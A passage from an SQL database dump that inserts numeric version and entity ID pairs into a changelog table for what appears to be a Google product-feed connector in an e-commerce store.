(4823, 247),
(4824, 247),
(4825, 247),
(4826, 247),
(4827, 248),
(4828, 248),
(4829, 248),
(4830, 248),
(4831, 248),
(4832, 248),
(4833, 249),
(4834, 249),
(4835, 249),
(4836, 249),
(4837, 249),
(4838, 249),
(4839, 250),
(4840, 250),
(4841, 250),
(4842, 250),
(4843, 250),
(4844, 250),
(4845, 251),
(4846, 251),
(4847, 251),
(4848, 251),
(4849, 251),
(4850, 251),
(4851, 251),
(4852, 251),
(4853, 251),
(4854, 252),
(4855, 252),
(4856, 252),
(4857, 252),
(4858, 252),
(4859, 252),
(4860, 253),
(4861, 253),
(4862, 253),
(4863, 253),
(4864, 253),
(4865, 253),
(4866, 254),
(4867, 254),
(4868, 254),
(4869, 254),
(4870, 254),
(4871, 254),
(4872, 255),
(4873, 255),
(4874, 255),
(4875, 255),
(4876, 255),
(4877, 255),
(4878, 256),
(4879, 256),
(4880, 256),
(4881, 256),
(4882, 256),
(4883, 256),
(4884, 257),
(4885, 257),
(4886, 257),
(4887, 257),
(4888, 257),
(4889, 257),
(4890, 258),
(4891, 258),
(4892, 258),
(4893, 258),
(4894, 258),
(4895, 258),
(4896, 259),
(4897, 259),
(4898, 259),
(4899, 259),
(4900, 259),
(4901, 259),
(4902, 160),
(4903, 160),
(4904, 161),
(4905, 161),
(4906, 162),
(4907, 162),
(4908, 163),
(4909, 163),
(4910, 164),
(4911, 164),
(4912, 165),
(4913, 165),
(4914, 166),
(4915, 166),
(4916, 167),
(4917, 167),
(4918, 168),
(4919, 168),
(4920, 169),
(4921, 169),
(4922, 170),
(4923, 170),
(4924, 171);
INSERT INTO `scconnector_google_feed_cl` (`version_id`, `entity_id`) VALUES
(4925, 172),
(4926, 172),
(4927, 173),
(4928, 173),
(4929, 174),
(4930, 174),
(4931, 175),
(4932, 175),
(4933, 176),
(4934, 176),
(4935, 177),
(4936, 177),
(4937, 178),
(4938, 178),
(4939, 179),
(4940, 179),
(4941, 180),
(4942, 180),
(4943, 181),
(4944, 181),
(4945, 182),
(4946, 182),
(4947, 183),
(4948, 183),
(4949, 184),
(4950, 184),
(4951, 185),
(4952, 185),
(4953, 186),
(4954, 186),
(4955, 187),
(4956, 188),
(4957, 188),
(4958, 189),
(4959, 189),
(4960, 190),
(4961, 190),
(4962, 191),
(4963, 191),
(4964, 192),
(4965, 192),
(4966, 193),
(4967, 193),
(4968, 194),
(4969, 194),
(4970, 195),
(4971, 195),
(4972, 196),
(4973, 196),
(4974, 197),
(4975, 197),
(4976, 198),
(4977, 198),
(4978, 199),
(4979, 199),
(4980, 200),
(4981, 200),
(4982, 201),
(4983, 201),
(4984, 202),
(4985, 202),
(4986, 203),
(4987, 204),
(4988, 204),
(4989, 205),
(4990, 205),
(4991, 206),
(4992, 206),
(4993, 207),
(4994, 207),
(4995, 208),
(4996, 208),
(4997, 209),
(4998, 209),
(4999, 210),
(5000, 210),
(5001, 211),
(5002, 211),
(5003, 212),
(5004, 212),
(5005, 213),
(5006, 213),
(5007, 214),
(5008, 214),
(5009, 215),
(5010, 215),
(5011, 216),
(5012, 216),
(5013, 217),
(5014, 217),
(5015, 218),
(5016, 218),
(5017, 219),
(5018, 220),
(5019, 220),
(5020, 221),
(5021, 221),
(5022, 222),
(5023, 222),
(5024, 223),
(5025, 223),
(5026, 224),
(5027, 224),
(5028, 225),
(5029, 225),
(5030, 226),
(5031, 226),
(5032, 227),
(5033, 227),
(5034, 228),
(5035, 228),
(5036, 229),
(5037, 229),
(5038, 230),
(5039, 230),
(5040, 231),
(5041, 231),
(5042, 232),
(5043, 232),
(5044, 233),
(5045, 233),
(5046, 234),
(5047, 234),
(5048, 235),
(5049, 236),
(5050, 236),
(5051, 237),
(5052, 237),
(5053, 238),
(5054, 238),
(5055, 239),
(5056, 239),
(5057, 240),
(5058, 240),
(5059, 241),
(5060, 241),
(5061, 242),
(5062, 242),
(5063, 243),
(5064, 243),
(5065, 244),
(5066, 244),
(5067, 245),
(5068, 245),
(5069, 246),
(5070, 246),
(5071, 247),
(5072, 247),
(5073, 248),
(5074, 248),
(5075, 249),
(5076, 249),
(5077, 250),
(5078, 250),
(5079, 251),
(5080, 252),
(5081, 252),
(5082, 253),
(5083, 253),
(5084, 254),
(5085, 254),
(5086, 255),
(5087, 255),
(5088, 256),
(5089, 256),
(5090, 257),
(5091, 257),
(5092, 258),
(5093, 258),
(5094, 259),
(5095, 259),
(5096, 260),
(5097, 261),
(5098, 262),
(5099, 263),
(5100, 264),
(5101, 265),
(5102, 266),
(5103, 267),
(5104, 268),
(5105, 269),
(5106, 270),
(5107, 271),
(5108, 272),
(5109, 273),
(5110, 274),
(5111, 275),
(5112, 276),
(5113, 277),
(5114, 278),
(5115, 279),
(5116, 280),
(5117, 281),
(5118, 282),
(5119, 283),
(5120, 284),
(5121, 285),
(5122, 286),
(5123, 287),
(5124, 288),
(5125, 289),
(5126, 290),
(5127, 291),
(5128, 292),
(5129, 293),
(5130, 294),
(5131, 295),
(5132, 296),
(5133, 297),
(5134, 298),
(5135, 299),
(5136, 300),
(5137, 301),
(5138, 302),
(5139, 303),
(5140, 304),
(5141, 305),
(5142, 306),
(5143, 307),
(5144, 308),
(5145, 309),
(5146, 310),
(5147, 311),
(5148, 312),
(5149, 313),
(5150, 314),
(5151, 315),
(5152, 316),
(5153, 317),
(5154, 318),
(5155, 319),
(5156, 320),
(5157, 321),
(5158, 322),
(5159, 323),
(5160, 324),
(5161, 325),
(5162, 326),
(5163, 327),
(5164, 328),
(5165, 329),
(5166, 330),
(5167, 331),
(5168, 332),
(5169, 333),
(5170, 334),
(5171, 335),
(5172, 336),
(5173, 337),
(5174, 338),
(5175, 339),
(5176, 340),
(5177, 341),
(5178, 342),
(5179, 343),
(5180, 344),
(5181, 345),
(5182, 346),
(5183, 347),
(5184, 348),
(5185, 349),
(5186, 350),
(5187, 351),
(5188, 352),
(5189, 353),
(5190, 354),
(5191, 355),
(5192, 356),
(5193, 357),
(5194, 358),
(5195, 359),
(5196, 260),
(5197, 261),
(5198, 261),
(5199, 261),
(5200, 262),
(5201, 263),
(5202, 264),
(5203, 264),
(5204, 264),
(5205, 265),
(5206, 266),
(5207, 267),
(5208, 267),
(5209, 267),
(5210, 268),
(5211, 269),
(5212, 270),
(5213, 270),
(5214, 270),
(5215, 271),
(5216, 272),
(5217, 273),
(5218, 273),
(5219, 273),
(5220, 274),
(5221, 275),
(5222, 276),
(5223, 276),
(5224, 276),
(5225, 277),
(5226, 278),
(5227, 279),
(5228, 279),
(5229, 279),
(5230, 280),
(5231, 281),
(5232, 282),
(5233, 282),
(5234, 282),
(5235, 283),
(5236, 283),
(5237, 283),
(5238, 284),
(5239, 284),
(5240, 284),
(5241, 285),
(5242, 286),
(5243, 287),
(5244, 287),
(5245, 287),
(5246, 288),
(5247, 289),
(5248, 290),
(5249, 290),
(5250, 290),
(5251, 291),
(5252, 292),
(5253, 293),
(5254, 293),
(5255, 293),
(5256, 294),
(5257, 295),
(5258, 296),
(5259, 296),
(5260, 296),
(5261, 297),
(5262, 298),
(5263, 299),
(5264, 299),
(5265, 299),
(5266, 300),
(5267, 300),
(5268, 300),
(5269, 301),
(5270, 302),
(5271, 303),
(5272, 303),
(5273, 303),
(5274, 304),
(5275, 305),
(5276, 306),
(5277, 306),
(5278, 306),
(5279, 307),
(5280, 308),
(5281, 309),
(5282, 309),
(5283, 309),
(5284, 310),
(5285, 311),
(5286, 312),
(5287, 312),
(5288, 312),
(5289, 313),
(5290, 314),
(5291, 315),
(5292, 315),
(5293, 315),
(5294, 316),
(5295, 317),
(5296, 317),
(5297, 317),
(5298, 318),
(5299, 319),
(5300, 320),
(5301, 320),
(5302, 320),
(5303, 321),
(5304, 322),
(5305, 323),
(5306, 323),
(5307, 323),
(5308, 324),
(5309, 325),
(5310, 326),
(5311, 326),
(5312, 326),
(5313, 327),
(5314, 328),
(5315, 329),
(5316, 329),
(5317, 329),
(5318, 330),
(5319, 331),
(5320, 331),
(5321, 331),
(5322, 332),
(5323, 333),
(5324, 333),
(5325, 333),
(5326, 334),
(5327, 335),
(5328, 336),
(5329, 336),
(5330, 336),
(5331, 337),
(5332, 338),
(5333, 339),
(5334, 339),
(5335, 339),
(5336, 340),
(5337, 341),
(5338, 342),
(5339, 342),
(5340, 342),
(5341, 343),
(5342, 344),
(5343, 345),
(5344, 345),
(5345, 345),
(5346, 346),
(5347, 347),
(5348, 347),
(5349, 347),
(5350, 348),
(5351, 349),
(5352, 350),
(5353, 350),
(5354, 350),
(5355, 351),
(5356, 352),
(5357, 353),
(5358, 353),
(5359, 353),
(5360, 354),
(5361, 355),
(5362, 356),
(5363, 356),
(5364, 356),
(5365, 357),
(5366, 358),
(5367, 359),
(5368, 359),
(5369, 359),
(5370, 260),
(5371, 260),
(5372, 260),
(5373, 260),
(5374, 260),
(5375, 260),
(5376, 260),
(5377, 261),
(5378, 261),
(5379, 261),
(5380, 261),
(5381, 261),
(5382, 261),
(5383, 261),
(5384, 262),
(5385, 262),
(5386, 262),
(5387, 262),
(5388, 262),
(5389, 262),
(5390, 262),
(5391, 263),
(5392, 263),
(5393, 263),
(5394, 263),
(5395, 263),
(5396, 263),
(5397, 263),
(5398, 264),
(5399, 264),
(5400, 264),
(5401, 264),
(5402, 264),
(5403, 264),
(5404, 264),
(5405, 265),
(5406, 265),
(5407, 265),
(5408, 265),
(5409, 265),
(5410, 265),
(5411, 265),
(5412, 266),
(5413, 266),
(5414, 266),
(5415, 266),
(5416, 266),
(5417, 266),
(5418, 266),
(5419, 267),
(5420, 267),
(5421, 267),
(5422, 267),
(5423, 267),
(5424, 267),
(5425, 267),
(5426, 267),
(5427, 267),
(5428, 267),
(5429, 268),
(5430, 268),
(5431, 268),
(5432, 268),
(5433, 268),
(5434, 268),
(5435, 268),
(5436, 269),
(5437, 269),
(5438, 269),
(5439, 269),
(5440, 269),
(5441, 269),
(5442, 269),
(5443, 270),
(5444, 270),
(5445, 270),
(5446, 270),
(5447, 270),
(5448, 270),
(5449, 270),
(5450, 271),
(5451, 271),
(5452, 271),
(5453, 271),
(5454, 271),
(5455, 271),
(5456, 271),
(5457, 272),
(5458, 272),
(5459, 272),
(5460, 272),
(5461, 272),
(5462, 272),
(5463, 272),
(5464, 273),
(5465, 273),
(5466, 273),
(5467, 273),
(5468, 273),
(5469, 273),
(5470, 273),
(5471, 274),
(5472, 274),
(5473, 274),
(5474, 274),
(5475, 274),
(5476, 274),
(5477, 274),
(5478, 275),
(5479, 275),
(5480, 275),
(5481, 275),
(5482, 275),
(5483, 275),
(5484, 275),
(5485, 276),
(5486, 276),
(5487, 276),
(5488, 276),
(5489, 276),
(5490, 276),
(5491, 276),
(5492, 277),
(5493, 277),
(5494, 277),
(5495, 277),
(5496, 277),
(5497, 277),
(5498, 277),
(5499, 278),
(5500, 278),
(5501, 278),
(5502, 278),
(5503, 278),
(5504, 278),
(5505, 278),
(5506, 279),
(5507, 279),
(5508, 279),
(5509, 279),
(5510, 279),
(5511, 279),
(5512, 279),
(5513, 280),
(5514, 280),
(5515, 280),
(5516, 280),
(5517, 280),
(5518, 280),
(5519, 280),
(5520, 281),
(5521, 281),
(5522, 281),
(5523, 281),
(5524, 281),
(5525, 281),
(5526, 281),
(5527, 282),
(5528, 282),
(5529, 282),
(5530, 282),
(5531, 282),
(5532, 282),
(5533, 282),
(5534, 283),
(5535, 283),
(5536, 283),
(5537, 283),
(5538, 283),
(5539, 283),
(5540, 283),
(5541, 283),
(5542, 283),
(5543, 283),
(5544, 283),
(5545, 284),
(5546, 284),
(5547, 284),
(5548, 284),
(5549, 284),
(5550, 284),
(5551, 284),
(5552, 285),
(5553, 285),
(5554, 285),
(5555, 285),
(5556, 285),
(5557, 285),
(5558, 285),
(5559, 286),
(5560, 286),
(5561, 286),
(5562, 286),
(5563, 286),
(5564, 286),
(5565, 286),
(5566, 287),
(5567, 287),
(5568, 287),
(5569, 287),
(5570, 287),
(5571, 287),
(5572, 287),
(5573, 288),
(5574, 288),
(5575, 288),
(5576, 288),
(5577, 288),
(5578, 288),
(5579, 288),
(5580, 289),
(5581, 289),
(5582, 289),
(5583, 289),
(5584, 289),
(5585, 289),
(5586, 289),
(5587, 290),
(5588, 290),
(5589, 290),
(5590, 290),
(5591, 290),
(5592, 290),
(5593, 290),
(5594, 291),
(5595, 291),
(5596, 291),
(5597, 291),
(5598, 291),
(5599, 291),
(5600, 291),
(5601, 292),
(5602, 292),
(5603, 292),
(5604, 292),
(5605, 292),
(5606, 292),
(5607, 292),
(5608, 293),
(5609, 293),
(5610, 293),
(5611, 293),
(5612, 293),
(5613, 293),
(5614, 293),
(5615, 294),
(5616, 294),
(5617, 294),
(5618, 294),
(5619, 294),
(5620, 294),
(5621, 294),
(5622, 295),
(5623, 295),
(5624, 295),
(5625, 295),
(5626, 295),
(5627, 295),
(5628, 295),
(5629, 296),
(5630, 296),
(5631, 296),
(5632, 296),
(5633, 296),
(5634, 296),
(5635, 296),
(5636, 297),
(5637, 297),
(5638, 297),
(5639, 297),
(5640, 297),
(5641, 297),
(5642, 297),
(5643, 298),
(5644, 298),
(5645, 298),
(5646, 298),
(5647, 298),
(5648, 298),
(5649, 298),
(5650, 299),
(5651, 299),
(5652, 299),
(5653, 299),
(5654, 299),
(5655, 299),
(5656, 299),
(5657, 299),
(5658, 299),
(5659, 299),
(5660, 299),
(5661, 300),
(5662, 300),
(5663, 300),
(5664, 300),
(5665, 300),
(5666, 300),
(5667, 300),
(5668, 301),
(5669, 301),
(5670, 301),
(5671, 301),
(5672, 301),
(5673, 301),
(5674, 301),
(5675, 302),
(5676, 302),
(5677, 302),
(5678, 302),
(5679, 302),
(5680, 302),
(5681, 302),
(5682, 303),
(5683, 303),
(5684, 303),
(5685, 303),
(5686, 303),
(5687, 303),
(5688, 303),
(5689, 304),
(5690, 304),
(5691, 304),
(5692, 304),
(5693, 304),
(5694, 304),
(5695, 304),
(5696, 305),
(5697, 305),
(5698, 305),
(5699, 305),
(5700, 305),
(5701, 305),
(5702, 305),
(5703, 306),
(5704, 306),
(5705, 306),
(5706, 306),
(5707, 306),
(5708, 306),
(5709, 306),
(5710, 307),
(5711, 307),
(5712, 307),
(5713, 307),
(5714, 307),
(5715, 307),
(5716, 307),
(5717, 308),
(5718, 308),
(5719, 308),
(5720, 308),
(5721, 308),
(5722, 308),
(5723, 308),
(5724, 309),
(5725, 309),
(5726, 309),
(5727, 309),
(5728, 309),
(5729, 309),
(5730, 309),
(5731, 310),
(5732, 310),
(5733, 310),
(5734, 310),
(5735, 310),
(5736, 310),
(5737, 310),
(5738, 311),
(5739, 311),
(5740, 311),
(5741, 311),
(5742, 311),
(5743, 311),
(5744, 311),
(5745, 312),
(5746, 312),
(5747, 312),
(5748, 312),
(5749, 312),
(5750, 312),
(5751, 312),
(5752, 313),
(5753, 313),
(5754, 313),
(5755, 313),
(5756, 313),
(5757, 313),
(5758, 313),
(5759, 314),
(5760, 314),
(5761, 314),
(5762, 314),
(5763, 314),
(5764, 314),
(5765, 314),
(5766, 315),
(5767, 315),
(5768, 315),
(5769, 315),
(5770, 315),
(5771, 315),
(5772, 315),
(5773, 315),
(5774, 315),
(5775, 315),
(5776, 315),
(5777, 316),
(5778, 316),
(5779, 316),
(5780, 316),
(5781, 316),
(5782, 316),
(5783, 316),
(5784, 317),
(5785, 317),
(5786, 317),
(5787, 317),
(5788, 317),
(5789, 317),
(5790, 317),
(5791, 318),
(5792, 318),
(5793, 318),
(5794, 318),
(5795, 318),
(5796, 318),
(5797, 318),
(5798, 319),
(5799, 319),
(5800, 319),
(5801, 319),
(5802, 319),
(5803, 319),
(5804, 319),
(5805, 320),
(5806, 320),
(5807, 320),
(5808, 320),
(5809, 320),
(5810, 320),
(5811, 320),
(5812, 321),
(5813, 321),
(5814, 321),
(5815, 321),
(5816, 321),
(5817, 321),
(5818, 321),
(5819, 322),
(5820, 322),
(5821, 322),
(5822, 322),
(5823, 322),
(5824, 322),
(5825, 322),
(5826, 323),
(5827, 323),
(5828, 323),
(5829, 323),
(5830, 323),
(5831, 323),
(5832, 323),
(5833, 324),
(5834, 324),
(5835, 324),
(5836, 324),
(5837, 324),
(5838, 324),
(5839, 324),
(5840, 325),
(5841, 325),
(5842, 325),
(5843, 325),
(5844, 325),
(5845, 325),
(5846, 325),
(5847, 326),
(5848, 326),
(5849, 326),
(5850, 326),
(5851, 326),
(5852, 326),
(5853, 326),
(5854, 327),
(5855, 327),
(5856, 327),
(5857, 327),
(5858, 327),
(5859, 327),
(5860, 327),
(5861, 328),
(5862, 328),
(5863, 328),
(5864, 328),
(5865, 328),
(5866, 328),
(5867, 328),
(5868, 329),
(5869, 329),
(5870, 329),
(5871, 329),
(5872, 329),
(5873, 329),
(5874, 329),
(5875, 330),
(5876, 330),
(5877, 330),
(5878, 330),
(5879, 330),
(5880, 330),
(5881, 330),
(5882, 331),
(5883, 331),
(5884, 331),
(5885, 331),
(5886, 331),
(5887, 331),
(5888, 331),
(5889, 331),
(5890, 331),
(5891, 331),
(5892, 331),
(5893, 332),
(5894, 332),
(5895, 332),
(5896, 332),
(5897, 332),
(5898, 332),
(5899, 332),
(5900, 333),
(5901, 333),
(5902, 333),
(5903, 333),
(5904, 333),
(5905, 333),
(5906, 333),
(5907, 334),
(5908, 334),
(5909, 334),
(5910, 334),
(5911, 334),
(5912, 334),
(5913, 334),
(5914, 335),
(5915, 335),
(5916, 335),
(5917, 335),
(5918, 335),
(5919, 335),
(5920, 335),
(5921, 336),
(5922, 336),
(5923, 336),
(5924, 336),
(5925, 336),
(5926, 336),
(5927, 336),
(5928, 337),
(5929, 337),
(5930, 337),
(5931, 337),
(5932, 337),
(5933, 337),
(5934, 337),
(5935, 338),
(5936, 338),
(5937, 338),
(5938, 338),
(5939, 338),
(5940, 338),
(5941, 338),
(5942, 339),
(5943, 339),
(5944, 339),
(5945, 339),
(5946, 339),
(5947, 339),
(5948, 339),
(5949, 340),
(5950, 340),
(5951, 340),
(5952, 340),
(5953, 340),
(5954, 340),
(5955, 340),
(5956, 341),
(5957, 341),
(5958, 341),
(5959, 341),
(5960, 341),
(5961, 341),
(5962, 341),
(5963, 342),
(5964, 342),
(5965, 342),
(5966, 342),
(5967, 342),
(5968, 342),
(5969, 342),
(5970, 343),
(5971, 343),
(5972, 343),
(5973, 343),
(5974, 343),
(5975, 343),
(5976, 343),
(5977, 344),
(5978, 344),
(5979, 344),
(5980, 344),
(5981, 344),
(5982, 344),
(5983, 344),
(5984, 345),
(5985, 345),
(5986, 345),
(5987, 345),
(5988, 345),
(5989, 345),
(5990, 345),
(5991, 346),
(5992, 346),
(5993, 346),
(5994, 346),
(5995, 346),
(5996, 346),
(5997, 346),
(5998, 347),
(5999, 347),
(6000, 347),
(6001, 347),
(6002, 347),
(6003, 347),
(6004, 347),
(6005, 347),
(6006, 347),
(6007, 347),
(6008, 347),
(6009, 348),
(6010, 348),
(6011, 348),
(6012, 348),
(6013, 348),
(6014, 348),
(6015, 348),
(6016, 349),
(6017, 349),
(6018, 349),
(6019, 349),
(6020, 349),
(6021, 349),
(6022, 349),
(6023, 350),
(6024, 350),
(6025, 350),
(6026, 350),
(6027, 350),
(6028, 350),
(6029, 350),
(6030, 351),
(6031, 351),
(6032, 351),
(6033, 351),
(6034, 351),
(6035, 351),
(6036, 351),
(6037, 352),
(6038, 352),
(6039, 352),
(6040, 352),
(6041, 352),
(6042, 352),
(6043, 352),
(6044, 353),
(6045, 353),
(6046, 353),
(6047, 353),
(6048, 353),
(6049, 353),
(6050, 353),
(6051, 354),
(6052, 354),
(6053, 354),
(6054, 354),
(6055, 354),
(6056, 354),
(6057, 354),
(6058, 355),
(6059, 355),
(6060, 355),
(6061, 355),
(6062, 355),
(6063, 355),
(6064, 355),
(6065, 356),
(6066, 356),
(6067, 356),
(6068, 356),
(6069, 356),
(6070, 356),
(6071, 356),
(6072, 357),
(6073, 357),
(6074, 357),
(6075, 357),
(6076, 357),
(6077, 357),
(6078, 357),
(6079, 358),
(6080, 358),
(6081, 358),
(6082, 358),
(6083, 358),
(6084, 358),
(6085, 358),
(6086, 359),
(6087, 359),
(6088, 359),
(6089, 359),
(6090, 359),
(6091, 359),
(6092, 359),
(6093, 260),
(6094, 261),
(6095, 262),
(6096, 263),
(6097, 264),
(6098, 265),
(6099, 266),
(6100, 267),
(6101, 268),
(6102, 269),
(6103, 270),
(6104, 271),
(6105, 272),
(6106, 273),
(6107, 274),
(6108, 275),
(6109, 276),
(6110, 277),
(6111, 278),
(6112, 279),
(6113, 280),
(6114, 281),
(6115, 282),
(6116, 283),
(6117, 284),
(6118, 285),
(6119, 286),
(6120, 287),
(6121, 288),
(6122, 289),
(6123, 290),
(6124, 291),
(6125, 292),
(6126, 293),
(6127, 294),
(6128, 295),
(6129, 296),
(6130, 297),
(6131, 298),
(6132, 299),
(6133, 300),
(6134, 301),
(6135, 302),
(6136, 303),
(6137, 304),
(6138, 305),
(6139, 306),
(6140, 307),
(6141, 308),
(6142, 309),
(6143, 310),
(6144, 311),
(6145, 312),
(6146, 313),
(6147, 314),
(6148, 315),
(6149, 316),
(6150, 317),
(6151, 318),
(6152, 319),
(6153, 320),
(6154, 321),
(6155, 322),
(6156, 323),
(6157, 324),
(6158, 325),
(6159, 326),
(6160, 327),
(6161, 328),
(6162, 329),
(6163, 330),
(6164, 331),
(6165, 332),
(6166, 333),
(6167, 334),
(6168, 335),
(6169, 336),
(6170, 337),
(6171, 338),
(6172, 339),
(6173, 340),
(6174, 341),
(6175, 342),
(6176, 343),
(6177, 344),
(6178, 345),
(6179, 346),
(6180, 347),
(6181, 348),
(6182, 349),
(6183, 350),
(6184, 351),
(6185, 352),
(6186, 353),
(6187, 354),
(6188, 355),
(6189, 356),
(6190, 357),
(6191, 358),
(6192, 359),
(6193, 260),
(6194, 260),
(6195, 260),
(6196, 260),
(6197, 260),
(6198, 260),
(6199, 261),
(6200, 261),
(6201, 261),
(6202, 261),
(6203, 261),
(6204, 261),
(6205, 262),
(6206, 262),
(6207, 262),
(6208, 262),
(6209, 262),
(6210, 262),
(6211, 263),
(6212, 263),
(6213, 263),
(6214, 263),
(6215, 263),
(6216, 263),
(6217, 264),
(6218, 264),
(6219, 264),
(6220, 264),
(6221, 264),
(6222, 264),
(6223, 265),
(6224, 265),
(6225, 265),
(6226, 265),
(6227, 265),
(6228, 265),
(6229, 266),
(6230, 266),
(6231, 266),
(6232, 266),
(6233, 266),
(6234, 266),
(6235, 267),
(6236, 267),
(6237, 267),
(6238, 267),
(6239, 267),
(6240, 267),
(6241, 267),
(6242, 267),
(6243, 267),
(6244, 268),
(6245, 268),
(6246, 268),
(6247, 268),
(6248, 268),
(6249, 268),
(6250, 269),
(6251, 269),
(6252, 269),
(6253, 269),
(6254, 269),
(6255, 269),
(6256, 270),
(6257, 270),
(6258, 270),
(6259, 270),
(6260, 270),
(6261, 270),
(6262, 271),
(6263, 271),
(6264, 271),
(6265, 271),
(6266, 271),
(6267, 271),
(6268, 272),
(6269, 272),
(6270, 272),
(6271, 272),
(6272, 272),
(6273, 272),
(6274, 273),
(6275, 273),
(6276, 273),
(6277, 273),
(6278, 273),
(6279, 273),
(6280, 274),
(6281, 274),
(6282, 274),
(6283, 274),
(6284, 274),
(6285, 274),
(6286, 275),
(6287, 275),
(6288, 275),
(6289, 275),
(6290, 275),
(6291, 275),
(6292, 276),
(6293, 276),
(6294, 276),
(6295, 276),
(6296, 276),
(6297, 276),
(6298, 277),
(6299, 277),
(6300, 277),
(6301, 277),
(6302, 277),
(6303, 277),
(6304, 278),
(6305, 278),
(6306, 278),
(6307, 278),
(6308, 278),
(6309, 278),
(6310, 279),
(6311, 279),
(6312, 279),
(6313, 279),
(6314, 279),
(6315, 279),
(6316, 280),
(6317, 280),
(6318, 280),
(6319, 280),
(6320, 280),
(6321, 280),
(6322, 281),
(6323, 281),
(6324, 281),
(6325, 281),
(6326, 281),
(6327, 281),
(6328, 282),
(6329, 282),
(6330, 282),
(6331, 282),
(6332, 282),
(6333, 282),
(6334, 283),
(6335, 283),
(6336, 283),
(6337, 283),
(6338, 283),
(6339, 283),
(6340, 283),
(6341, 283),
(6342, 283),
(6343, 284),
(6344, 284),
(6345, 284),
(6346, 284),
(6347, 284),
(6348, 284),
(6349, 285),
(6350, 285),
(6351, 285),
(6352, 285),
(6353, 285),
(6354, 285),
(6355, 286),
(6356, 286),
(6357, 286),
(6358, 286),
(6359, 286),
(6360, 286),
(6361, 287),
(6362, 287),
(6363, 287),
(6364, 287),
(6365, 287),
(6366, 287),
(6367, 288),
(6368, 288),
(6369, 288),
(6370, 288),
(6371, 288),
(6372, 288),
(6373, 289),
(6374, 289),
(6375, 289),
(6376, 289),
(6377, 289),
(6378, 289),
(6379, 290),
(6380, 290),
(6381, 290),
(6382, 290),
(6383, 290),
(6384, 290),
(6385, 291),
(6386, 291),
(6387, 291),
(6388, 291),
(6389, 291),
(6390, 291),
(6391, 292),
(6392, 292),
(6393, 292),
(6394, 292),
(6395, 292),
(6396, 292),
(6397, 293),
(6398, 293),
(6399, 293),
(6400, 293),
(6401, 293),
(6402, 293),
(6403, 294),
(6404, 294),
(6405, 294),
(6406, 294),
(6407, 294),
(6408, 294),
(6409, 295),
(6410, 295),
(6411, 295),
(6412, 295),
(6413, 295),
(6414, 295),
(6415, 296),
(6416, 296),
(6417, 296),
(6418, 296),
(6419, 296),
(6420, 296),
(6421, 297),
(6422, 297),
(6423, 297),
(6424, 297),
(6425, 297),
(6426, 297),
(6427, 298),
(6428, 298),
(6429, 298),
(6430, 298),
(6431, 298),
(6432, 298),
(6433, 299),
(6434, 299),
(6435, 299),
(6436, 299),
(6437, 299),
(6438, 299),
(6439, 299),
(6440, 299),
(6441, 299),
(6442, 300),
(6443, 300),
(6444, 300),
(6445, 300),
(6446, 300),
(6447, 300),
(6448, 301),
(6449, 301),
(6450, 301),
(6451, 301),
(6452, 301),
(6453, 301),
(6454, 302),
(6455, 302),
(6456, 302),
(6457, 302),
(6458, 302),
(6459, 302),
(6460, 303),
(6461, 303),
(6462, 303),
(6463, 303),
(6464, 303),
(6465, 303),
(6466, 304),
(6467, 304),
(6468, 304),
(6469, 304),
(6470, 304),
(6471, 304),
(6472, 305),
(6473, 305),
(6474, 305),
(6475, 305),
(6476, 305),
(6477, 305),
(6478, 306),
(6479, 306),
(6480, 306),
(6481, 306),
(6482, 306),
(6483, 306),
(6484, 307),
(6485, 307),
(6486, 307),
(6487, 307),
(6488, 307),
(6489, 307),
(6490, 308),
(6491, 308),
(6492, 308),
(6493, 308),
(6494, 308),
(6495, 308),
(6496, 309),
(6497, 309),
(6498, 309),
(6499, 309),
(6500, 309),
(6501, 309),
(6502, 310),
(6503, 310),
(6504, 310),
(6505, 310),
(6506, 310),
(6507, 310),
(6508, 311),
(6509, 311),
(6510, 311),
(6511, 311),
(6512, 311),
(6513, 311),
(6514, 312),
(6515, 312),
(6516, 312),
(6517, 312),
(6518, 312),
(6519, 312),
(6520, 313),
(6521, 313),
(6522, 313),
(6523, 313),
(6524, 313),
(6525, 313),
(6526, 314),
(6527, 314),
(6528, 314),
(6529, 314),
(6530, 314),
(6531, 314),
(6532, 315),
(6533, 315),
(6534, 315),
(6535, 315),
(6536, 315),
(6537, 315),
(6538, 315),
(6539, 315),
(6540, 315),
(6541, 316),
(6542, 316),
(6543, 316),
(6544, 316),
(6545, 316),
(6546, 316),
(6547, 317),
(6548, 317),
(6549, 317),
(6550, 317),
(6551, 317),
(6552, 317),
(6553, 318),
(6554, 318),
(6555, 318),
(6556, 318),
(6557, 318),
(6558, 318),
(6559, 319),
(6560, 319),
(6561, 319),
(6562, 319),
(6563, 319),
(6564, 319),
(6565, 320),
(6566, 320),
(6567, 320),
(6568, 320),
(6569, 320),
(6570, 320),
(6571, 321),
(6572, 321),
(6573, 321),
(6574, 321),
(6575, 321),
(6576, 321),
(6577, 322),
(6578, 322),
(6579, 322),
(6580, 322),
(6581, 322),
(6582, 322),
(6583, 323),
(6584, 323),
(6585, 323),
(6586, 323),
(6587, 323),
(6588, 323),
(6589, 324),
(6590, 324),
(6591, 324),
(6592, 324),
(6593, 324),
(6594, 324),
(6595, 325),
(6596, 325),
(6597, 325),
(6598, 325),
(6599, 325),
(6600, 325),
(6601, 326),
(6602, 326),
(6603, 326),
(6604, 326),
(6605, 326),
(6606, 326),
(6607, 327),
(6608, 327),
(6609, 327),
(6610, 327),
(6611, 327),
(6612, 327),
(6613, 328),
(6614, 328),
(6615, 328),
(6616, 328),
(6617, 328),
(6618, 328),
(6619, 329),
(6620, 329),
(6621, 329),
(6622, 329),
(6623, 329),
(6624, 329),
(6625, 330),
(6626, 330),
(6627, 330),
(6628, 330),
(6629, 330),
(6630, 330),
(6631, 331),
(6632, 331),
(6633, 331),
(6634, 331),
(6635, 331),
(6636, 331),
(6637, 331),
(6638, 331),
(6639, 331),
(6640, 332),
(6641, 332),
(6642, 332),
(6643, 332),
(6644, 332),
(6645, 332),
(6646, 333),
(6647, 333),
(6648, 333),
(6649, 333),
(6650, 333),
(6651, 333),
(6652, 334),
(6653, 334),
(6654, 334),
(6655, 334),
(6656, 334),
(6657, 334),
(6658, 335),
(6659, 335),
(6660, 335),
(6661, 335),
(6662, 335),
(6663, 335),
(6664, 336),
(6665, 336),
(6666, 336),
(6667, 336),
(6668, 336),
(6669, 336),
(6670, 337),
(6671, 337),
(6672, 337),
(6673, 337),
(6674, 337),
(6675, 337),
(6676, 338),
(6677, 338),
(6678, 338),
(6679, 338),
(6680, 338),
(6681, 338),
(6682, 339),
(6683, 339),
(6684, 339),
(6685, 339),
(6686, 339),
(6687, 339),
(6688, 340),
(6689, 340),
(6690, 340),
(6691, 340),
(6692, 340),
